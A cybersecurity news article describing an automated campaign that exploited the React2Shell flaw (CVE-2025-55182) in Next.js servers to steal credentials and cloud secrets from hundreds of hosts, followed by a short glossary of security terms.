Next.js Under Siege: Automated Hackers Ransack 700+ Servers in Credential Heist

The digital world was rocked this week as a wave of stealthy cyberattacks swept across the globe, targeting web servers built on the popular Next.js framework. In a matter of hours, an organized threat group leveraged a newly discovered vulnerability - dubbed React2Shell - to crack open more than 700 servers, siphoning off a trove of sensitive credentials and cloud secrets. For businesses relying on modern web stacks, the incident is a wake-up call: the automation of hacking has reached terrifying new heights.

The Anatomy of a High-Speed Hack

The campaign, tracked as UAT-10608 by Cisco Talos researchers, didn’t rely on human hackers manually probing for weaknesses. Instead, it weaponized automation - scanning the internet for Next.js applications with exposed server endpoints vulnerable to the React2Shell flaw. This bug, officially cataloged as CVE-2025-55182, lurks in React Server Components and allows attackers to execute code on the server simply by sending specially crafted data - no login or prior access required.

Once a target was found, the attack chain triggered automatically. A small script landed in the server’s temporary directory, fetching a more sophisticated multi-stage tool. This tool worked methodically: first stealing environment variables (often rich with secrets), then hunting for Kubernetes tokens, shell command histories, and even cloud provider metadata from AWS, Google Cloud, and Azure. In some cases, it mapped running Docker containers and internal dashboards, setting the stage for deeper compromise.

All stolen data was quietly exfiltrated to attacker-controlled infrastructure and organized using a slick web interface dubbed NEXUS Listener. Researchers found a misconfigured instance that laid bare the scale of the breach - 766 hosts compromised in a single day, with a buffet of credentials neatly categorized and ready for further exploitation.

Why This Breach Matters

The numbers are staggering: over 90% of breached servers gave up their database credentials, while more than three-quarters exposed private SSH keys - effectively handing attackers the keys to the kingdom for lateral movement. Dozens of victims lost live payment processor keys (Stripe), and many saw their GitHub, OpenAI, and Azure credentials scooped up.

The UAT-10608 campaign is a stark reminder of the dangers posed by deserialization vulnerabilities in modern frameworks - and how quickly attackers can capitalize on unpatched systems. Organizations using Next.js must act fast: audit deployments, apply patches, and rotate all potentially exposed secrets before attackers return for round two.

Looking Forward: Can Automation Be Stopped?

The speed and precision of the React2Shell campaign have set a new benchmark for automated cybercrime. As attackers continue to industrialize their methods, defenders must match their pace. The race is on - not just to patch, but to rethink how we secure the interconnected web.

WIKICROOK

• Remote Code Execution (RCE): Remote Code Execution (RCE) is when an attacker runs their own code on a victim’s system, often leading to full control or compromise of that system.
• Deserialization: Deserialization converts data into usable program objects. If not done securely, it can let attackers inject harmful instructions into applications.
• Environment Variables: Environment variables are hidden computer settings that store important and sensitive information, such as passwords or API keys, used by programs and servers.
• SSH Key: An SSH key is a digital credential that enables secure, passwordless access to remote servers. If compromised, it can allow unauthorized system access.
• API Key: An API key is a unique code that lets programs access data or services. If not properly secured, it can pose a cybersecurity risk.